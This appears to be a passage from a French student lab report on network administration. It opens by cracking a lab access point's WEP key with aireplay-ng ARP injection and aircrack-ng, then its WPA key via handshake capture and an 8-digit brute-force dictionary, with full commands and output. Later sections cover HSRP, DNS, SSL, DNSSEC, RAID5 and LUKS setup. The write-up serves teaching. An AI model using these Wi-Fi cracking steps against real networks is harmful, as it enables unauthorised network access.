&amp;lt;pre&amp;gt; airodump-ng –w out –c 13 –bssid 04 :DA :D2 :9C :50 :55 wlan0 &amp;lt;/pre&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour le craquage, il faut au préalable surchargé de requête ARP le réseau cible pour récupérer un maximum de trame d’échanges.&lt;br /&gt;
&amp;lt;pre&amp;gt; aireplay-ng -3 –e cracotte06 –a 04 :DA :D2 :9C :50 :55 –b 04 :DA :D2 :9C :50 :55 –h 00:0F:B5:92:23:6B –x 1000 –n out-ox.cap wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois un nombre de trame récupéré assez conséquent, on lance l’utilitaire : &amp;lt;pre&amp;gt;aircarck-ng out_ox.cap&amp;lt;/pre&amp;gt; avec out_ox.cap le fichier de sauvegarde contenant toutes les trames ARP récupérées. &lt;br /&gt;
&lt;br /&gt;
On a alors réussi notre craquage au bout de quelque minutes :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:01] Tested 785 keys (got 1349085 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  2   EE(1862400) 75(1396736) DB(1392128) FF(1388544) 50(1387520) &lt;br /&gt;
    1    1/  4   DD(1419264) 1B(1397504) 2C(1392128) 54(1387776) 26(1385728) &lt;br /&gt;
    2   47/  2   DB(1365760) 38(1364736) 00(1364480) 22(1364480) 82(1364480) &lt;br /&gt;
    3    1/  2   26(1407488) 2C(1390592) 65(1387520) F0(1387520) FE(1387520) &lt;br /&gt;
    4    4/  4   F6(1383168) CD(1382656) 7E(1381376) F0(1380096) 58(1379840) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 6e séance (additionnel) ====&lt;br /&gt;
=====Configuration HSRP=====&lt;br /&gt;
Le VRRP n'était pas compatible sur le routeur du groupe 6 (3560E) à cause de la trop faible version de 'IOS Cisco. Du coup, il nous a été demandé de mettre en place le protocole en dessous de VRRP, HSRP.&amp;lt;br /&amp;gt;&lt;br /&gt;
Le protocole HSRP fonctionne comme le VRRP, et s'implémente, par BDI, comme suit:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Sstandby 1 ip 10.60.X.3&lt;br /&gt;
standby 1 preempt&lt;br /&gt;
standby 1 priority 100&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il fallait aussi que notre routeur soit connecté au 2e commutateur via une liaison fibre en mode trunk. Ainsi, nous pouvons voir, dans ce qui suit, que le routeur maitre est le routeur 3560E, et que nous sommes en standby !&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;BDI2 - Group 1 (version 2)&lt;br /&gt;
  State is Standby&lt;br /&gt;
    7 state changes, last state change 00:01:16&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Active virtual MAC address is 0000.0c9f.f001 (MAC Not In Use)&lt;br /&gt;
    Local virtual MAC address is 0000.0c9f.f001 (v2 default)&lt;br /&gt;
  Hello time 3 sec, hold time 10 sec&lt;br /&gt;
    Next hello sent in 0.128 secs&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Active router is 10.60.2.2, priority 110 (expires in 8.784 sec)&lt;br /&gt;
    MAC address is d4d7.4842.53c1&lt;br /&gt;
  Standby router is local&lt;br /&gt;
  Priority 100 (default 100)&lt;br /&gt;
  Group name is &amp;quot;Vlan2&amp;quot; (cfgd)&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Craquage clé WPA =====&lt;br /&gt;
&lt;br /&gt;
Pour ce craquage, nous avons gardé la même cible, c'est à dire cracotte06. Il faut encore ici s'assurer qu'une machine est connecté à cette borne.&lt;br /&gt;
Pour le craquage WPA, il nous faut 2 éléments : &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puis db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''000-speedflash.space-ssl.conf''' afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;#NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
        &amp;lt;Directory /var/www/www.speedflash.space&amp;gt;&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
ServerName &amp;quot;speedflash.space&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier '''ports.conf''' du serveur Apache pour qu'il écoute le port 443 (SSL):&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;Listen 80 443&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
        Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#&amp;lt;IfModule mod_ssl.c&amp;gt;&lt;br /&gt;
#       Listen 443&lt;br /&gt;
        #NameVirtualHost *:443&lt;br /&gt;
#&amp;lt;/IfModule&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2enmod ssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:SSLSite.png]]&lt;br /&gt;
&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 7e séance====&lt;br /&gt;
=====Création du RAID5=====&lt;br /&gt;
On ajoute premièrement les partitions à la définition de la machine virtuelle:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;'phy:/dev/virtual/RedFlash,xvdb,w',&lt;br /&gt;
'phy:/dev/virtual/BlackFlash,xvdc,w',&lt;br /&gt;
'phy:/dev/virtual/ReverseFlash,xvdd,w'&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, on crée le RAID5 avec les 3 partitions :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mdadm --create /dev/md0 --level=5 --raid-devices 3 /dev/xvdb /dev/xvdc /dev/xvdd&amp;lt;/pre&amp;gt;&lt;br /&gt;
On vérifie en regardant le fichier de log /proc/mdstat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.0% (692512/1047552) finish=0.1min speed=30109K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===============&amp;gt;.....]  recovery = 78.5% (823084/1047552) finish=0.1min speed=29395K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [================&amp;gt;....]  recovery = 84.2% (883700/1047552) finish=0.0min speed=29456K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [=================&amp;gt;...]  recovery = 87.4% (916664/1047552) finish=0.0min speed=29569K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 93.5% (980148/1047552) finish=0.0min speed=30182K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 96.6% (1012980/1047552) finish=0.0min speed=30267K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 98.1% (1029332/1047552) finish=0.0min speed=30794K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===================&amp;gt;.]  recovery = 99.5% (1043028/1047552) finish=0.0min speed=30260K/sec&lt;br /&gt;
&lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@Flash:~# [ 1462.872022] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4]&lt;br /&gt;
md0 : active raid5 xvdd[3] xvdc[1] xvdb[0]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, on affecte un système de fichier à notre nouveau RAID sur /dev/md0, et on le monte dans /mnt: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# mkfs /dev/md0&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
Creating filesystem with 523776 4k blocks and 131072 inodes&lt;br /&gt;
Filesystem UUID: ca2b4bcd-57d3-4f12-bc49-0f7f9cb312b6&lt;br /&gt;
Superblock backups stored on blocks:&lt;br /&gt;
	32768, 98304, 163840, 229376, 294912&lt;br /&gt;
&lt;br /&gt;
Allocating group tables: done&lt;br /&gt;
Writing inode tables: done&lt;br /&gt;
Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
root@Flash:~# mount /dev/md0 /mnt&lt;br /&gt;
[ 1486.818679] EXT4-fs (md0): mounting ext2 file system using the ext4 subsystem&lt;br /&gt;
[ 1486.878898] EXT4-fs (md0): mounted filesystem without journal. Opts: (null)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Cryptage de données=====&lt;br /&gt;
Pour crypter les données, on installe GParted et cryptsetup. Sur la SD, il ne doit y avoir qu'une seule partition. C'est ce qu'on fait grâce à GParted.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, on commence le cryptage des données sur la carte SD: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/mmcblk1p1 &lt;br /&gt;
&lt;br /&gt;
WARNING!&lt;br /&gt;
========&lt;br /&gt;
Cette action écrasera définitivement les données sur /dev/mmcblk1p1.&lt;br /&gt;
&lt;br /&gt;
Are you sure? (Type uppercase yes): YES&lt;br /&gt;
Saisissez la phrase secrète : ***************&lt;br /&gt;
Vérifiez la phrase secrète : ***************&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on ouvre le volume crypté et on crée un système de fichiers avec le dossier home/ :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# cryptsetup luksOpen /dev/mmcblk1p1 home&lt;br /&gt;
Saisissez la phrase secrète pour /dev/mmcblk1p1 : &lt;br /&gt;
root@Rason:/home/pifou# mkfs.ext4 /dev/mapper/home&lt;br /&gt;
mke2fs 1.42.12 (29-Aug-2014)&lt;br /&gt;
En train de créer un système de fichiers avec 3777792 4k blocs et 944704 i-noeuds.&lt;br /&gt;
UUID de système de fichiers=2c54cece-155f-44ed-b4a5-96b9429e7879&lt;br /&gt;
Superblocs de secours stockés sur les blocs : &lt;br /&gt;
	32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208&lt;br /&gt;
&lt;br /&gt;
Allocation des tables de groupe : complété                        &lt;br /&gt;
Écriture des tables d'i-noeuds : complété                        &lt;br /&gt;
Création du journal (32768 blocs) : complété&lt;br /&gt;
Écriture des superblocs et de l'information de comptabilité du système de&lt;br /&gt;
fichiers : complété&amp;lt;/pre&amp;gt;&lt;br /&gt;
On monte la partition : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Rason:/home/pifou# mount -t ext4 /dev/mapper/home /mnt/&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous avons écrit dans la carte SD, et nous avons démonté la partition et fermé la partition crypté: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Rason:/# umount /mnt&lt;br /&gt;
root@Rason:/# cryptsetup luksClose home&amp;lt;/pre&amp;gt;&lt;br /&gt;
====Travail réalisé la 8e séance====&lt;br /&gt;
=====Modification routeur pour prise en charge Wifi=====&lt;br /&gt;
Nous avons du modifier la configuration de notre routeur afin de prendre en compte notre borne Wifi. Nous avons donc rajouté le BDI1 avec comme adresse de routeur 10.60.1.1. &amp;lt;br /&amp;gt;&lt;br /&gt;
Ce BDI est un peu spécial, dans la mesure où il doit pouvoir avoir accès à tous les autres BDI. Les paquets qui y transitent ne doivent donc pas être taggés par le protocole DOT1Q (protocole VLAN). C'est pourquoi, dans notre configuration, nous avons ajouté la ligne '''encapsulation untagged''', pour éviter que les paquets ne soient taggés par le numéro de VLAN.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Sécurisation Wifi par WPA-EAP=====&lt;br /&gt;
Pour cette partie, nous commençons donc à installer un serveur FreeRadius sur notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous ajoutons notre login et notre mot de passe qui nous serviront à nous connecter à la borne : &amp;lt;br /&amp;gt;&lt;br /&gt;
